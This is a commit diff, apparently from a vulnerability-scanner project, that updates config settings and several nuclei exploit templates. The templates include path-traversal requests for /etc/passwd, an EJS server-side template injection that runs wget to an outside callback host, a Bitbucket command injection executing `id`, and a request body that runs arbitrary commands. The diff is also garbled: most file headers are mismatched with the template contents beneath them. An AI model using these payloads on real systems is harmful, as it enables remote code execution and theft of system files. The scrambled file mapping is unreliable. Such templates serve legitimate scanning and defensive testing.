up PoCs 2022-09-22

Author: hktalent

config/config.json

@@ -99,7 +99,7 @@
   "CheckWeakPassword": true,
   "esthread": 8,
   "hydrathread": 64,
-  "Fuzzthreads": 32,
+  "Fuzzthreads": 16,
   "enableFingerTitleHeaderMd5Hex": false,
   "Cookie": "",
   "esUrl": "http://127.0.0.1:9200/%s_index/_doc/%s",

config/config_me.json

@@ -82,7 +82,7 @@
     "FollowRedirects": false,
     "MaxRedirects": 3
   },
-  "enableEsSv": false,
+  "enableEsSv": true,
   "CheckWeakPassword": true,
   "esthread": 8,
   "hydrathread": 64,

config/nuclei-templates/README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1430 | daffainfo     |   631 | cves             |  1407 | info     |  1474 | http    |  3858 |
-| panel     |   655 | dhiyaneshdk   |   584 | exposed-panels   |   662 | high     |  1009 | file    |    76 |
-| edb       |   563 | pikpikcu      |   329 | vulnerabilities  |   509 | medium   |   818 | network |    51 |
-| lfi       |   509 | pdteam        |   269 | technologies     |   282 | critical |   478 | dns     |    17 |
-| xss       |   491 | geeknik       |   187 | exposures        |   275 | low      |   225 |         |       |
-| wordpress |   419 | dwisiswant0   |   169 | misconfiguration |   237 | unknown  |    11 |         |       |
-| exposure  |   407 | 0x_akoko      |   165 | token-spray      |   230 |          |       |         |       |
-| cve2021   |   352 | princechaddha |   151 | workflows        |   189 |          |       |         |       |
-| rce       |   337 | ritikchaddha  |   137 | default-logins   |   103 |          |       |         |       |
-| wp-plugin |   316 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
-
-**296 directories, 4231 files**.
+| cve       |  1444 | daffainfo     |   631 | cves             |  1421 | info     |  1482 | http    |  3894 |
+| panel     |   663 | dhiyaneshdk   |   594 | exposed-panels   |   670 | high     |  1031 | file    |    76 |
+| edb       |   565 | pikpikcu      |   329 | vulnerabilities  |   513 | medium   |   818 | network |    52 |
+| lfi       |   513 | pdteam        |   269 | technologies     |   283 | critical |   483 | dns     |    17 |
+| xss       |   496 | geeknik       |   192 | exposures        |   280 | low      |   228 |         |       |
+| wordpress |   422 | dwisiswant0   |   169 | misconfiguration |   240 | unknown  |    11 |         |       |
+| exposure  |   415 | 0x_akoko      |   166 | token-spray      |   230 |          |       |         |       |
+| cve2021   |   353 | princechaddha |   151 | workflows        |   190 |          |       |         |       |
+| rce       |   338 | ritikchaddha  |   137 | default-logins   |   103 |          |       |         |       |
+| wp-plugin |   319 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
+
+**297 directories, 4270 files**.
 
 </td>
 </tr>

config/nuclei-templates/TEMPLATES-STATS.json

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1430 | daffainfo     |   631 | cves             |  1407 | info     |  1474 | http    |  3858 |
-| panel     |   655 | dhiyaneshdk   |   584 | exposed-panels   |   662 | high     |  1009 | file    |    76 |
-| edb       |   563 | pikpikcu      |   329 | vulnerabilities  |   509 | medium   |   818 | network |    51 |
-| lfi       |   509 | pdteam        |   269 | technologies     |   282 | critical |   478 | dns     |    17 |
-| xss       |   491 | geeknik       |   187 | exposures        |   275 | low      |   225 |         |       |
-| wordpress |   419 | dwisiswant0   |   169 | misconfiguration |   237 | unknown  |    11 |         |       |
-| exposure  |   407 | 0x_akoko      |   165 | token-spray      |   230 |          |       |         |       |
-| cve2021   |   352 | princechaddha |   151 | workflows        |   189 |          |       |         |       |
-| rce       |   337 | ritikchaddha  |   137 | default-logins   |   103 |          |       |         |       |
-| wp-plugin |   316 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
+| cve       |  1444 | daffainfo     |   631 | cves             |  1421 | info     |  1482 | http    |  3894 |
+| panel     |   663 | dhiyaneshdk   |   594 | exposed-panels   |   670 | high     |  1031 | file    |    76 |
+| edb       |   565 | pikpikcu      |   329 | vulnerabilities  |   513 | medium   |   818 | network |    52 |
+| lfi       |   513 | pdteam        |   269 | technologies     |   283 | critical |   483 | dns     |    17 |
+| xss       |   496 | geeknik       |   192 | exposures        |   280 | low      |   228 |         |       |
+| wordpress |   422 | dwisiswant0   |   169 | misconfiguration |   240 | unknown  |    11 |         |       |
+| exposure  |   415 | 0x_akoko      |   166 | token-spray      |   230 |          |       |         |       |
+| cve2021   |   353 | princechaddha |   151 | workflows        |   190 |          |       |         |       |
+| rce       |   338 | ritikchaddha  |   137 | default-logins   |   103 |          |       |         |       |
+| wp-plugin |   319 | pussycat0x    |   133 | file             |    76 |          |       |         |       |

config/nuclei-templates/TEMPLATES-STATS.md

@@ -0,0 +1,34 @@
+id: CVE-2015-3035
+
+info:
+  name: Multiple TP-LINK Products Vulnerable - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: |
+    Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
+  reference:
+    - https://seclists.org/fulldisclosure/2015/Apr/26
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-3035
+    - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt
+    - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware
+  classification:
+    cve-id: CVE-2015-3035
+  metadata:
+    shodan-query: http.title:"TP-LINK"
+    verified: "true"
+  tags: router,lfi,seclists,cve,cve2015,tplink,kev
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login/../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/TOP-10.md

@@ -1,13 +1,13 @@
 id: CVE-2021-24214
 info:
-  name: OpenID Connect Generic Client 3.8.0-3.8.1 - Reflected Cross Site Scripting (XSS) via Login Error
+  name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting
   author: tess
   severity: medium
-  description: The OpenID Connect Generic Client WordPress plugin 3.8.0 and 3.8.1 did not sanitise the login error when output back in the login form, leading to a reflected Cross-Site Scripting issue. This issue does not require authentication and can be exploited with the default configuration.
+  description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.
   reference:
     - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24214
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24214
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/09/19

config/nuclei-templates/cves/2015/CVE-2015-3035.yaml

@@ -42,13 +42,12 @@ requests:
         Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
 
-        echo Echo: CVE-2021-42013; echo; {{cmd}};
+        echo Content-Type: text/plain; echo; {{cmd}}
 
     stop-at-first-match: true
     unsafe: true
     matchers-condition: or
     matchers:
-
       - type: regex
         name: LFI
         regex:

config/nuclei-templates/cves/2021/CVE-2021-24214.yaml

@@ -1,16 +1,16 @@
 id: CVE-2022-0678
 
 info:
-  name: Microweber < 1.2.11- Cross-Site Scripting
+  name: Packagist <1.2.11 - Cross-Site Scripting
   author: tess
   severity: medium
   description: |
-    Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
+    Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
   reference:
     - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
     - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
     - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -43,3 +43,5 @@ requests:
       - type: status
         status:
           - 404
+
+# Enhanced by md on 2022/09/19

config/nuclei-templates/cves/2021/CVE-2021-42013.yaml

@@ -0,0 +1,43 @@
+id: CVE-2022-2544
+info:
+  name: Ninja Job Board < 1.3.3 - Resume Disclosure via Directory Listing
+  author: tess
+  severity: high
+  description: The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated Directory Listing which allows the download of uploaded resumes.
+  reference:
+    - https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php
+    - https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2544
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-2544
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-2544
+    cwe-id: CWE-425
+  metadata:
+    verified: true
+  tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp/wp-content/uploads/wpjobboard/"
+      - "{{BaseURL}}/wp-content/uploads/wpjobboard/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Index of /wp/wp-content/uploads/wpjobboard"
+          - "Index of /wp-content/uploads/wpjobboard"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-0678.yaml

@@ -0,0 +1,37 @@
+id: CVE-2022-29078
+
+info:
+  name: Ejs - RCE
+  author: For3stCo1d
+  severity: critical
+  description: |
+    The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
+  reference:
+    - https://eslam.io/posts/ejs-server-side-template-injection-rce/
+    - https://github.com/miko550/CVE-2022-29078
+    - https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29078
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29078
+    cwe-id: CWE-74
+  tags: cve,cve2022,rce,ejs,nodejs,oast
+
+requests:
+  - raw:
+      - |
+        GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "You are viewing page number"

config/nuclei-templates/cves/2022/CVE-2022-2544.yaml

@@ -0,0 +1,39 @@
+id: CVE-2022-34121
+
+info:
+  name: CuppaCMS v1.0 - Local File Inclusion
+  author: edoardottt
+  severity: high
+  description: |
+    Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.
+  reference:
+    - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34121
+    - https://github.com/CuppaCMS/CuppaCMS/issues/18
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-34121
+    cwe-id: CWE-829
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,lfi,cuppa,cms
+
+requests:
+  - raw:
+      - |
+        POST /templates/default/html/windows/right.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        url=../../../../../../../../../../../../etc/passwd
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-29078.yaml

@@ -0,0 +1,66 @@
+id: CVE-2022-36804
+
+info:
+  name: Atlassian Bitbucket Command Injection Vulnerability
+  author: DhiyaneshDk,tess,sullo
+  severity: high
+  description: |
+    Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request.
+  reference:
+    - https://github.com/notdls/CVE-2022-36804
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-36804
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
+    - https://jira.atlassian.com/browse/BSERV-13438
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-36804
+    cwe-id: CWE-77
+  metadata:
+    shodan-query: http.component:"BitBucket"
+  tags: cve,cve2022,bitbucket,atlassian
+
+variables:
+  data: '{{rand_base(5)}}'
+
+requests:
+  - raw:
+      - |
+        GET /rest/api/latest/repos HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1
+        Host: {{Hostname}}
+
+    iterate-all: true
+    extractors:
+      - type: json # type of the extractor
+        part: body
+        name: key
+        json:
+          - '.["values"] | .[] | .["project"] | .key'
+        internal: true
+
+      - type: json # type of the extractor
+        part: body
+        name: slug
+        json:
+          - '.["values"] | .[]  | .slug'
+        internal: true
+
+      - type: regex
+        group: 1
+        regex:
+          - 'uid=.*\(([a-z]+)\):'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "com.atlassian.bitbucket.scm.CommandFailedException"
+
+      - type: status
+        status:
+          - 500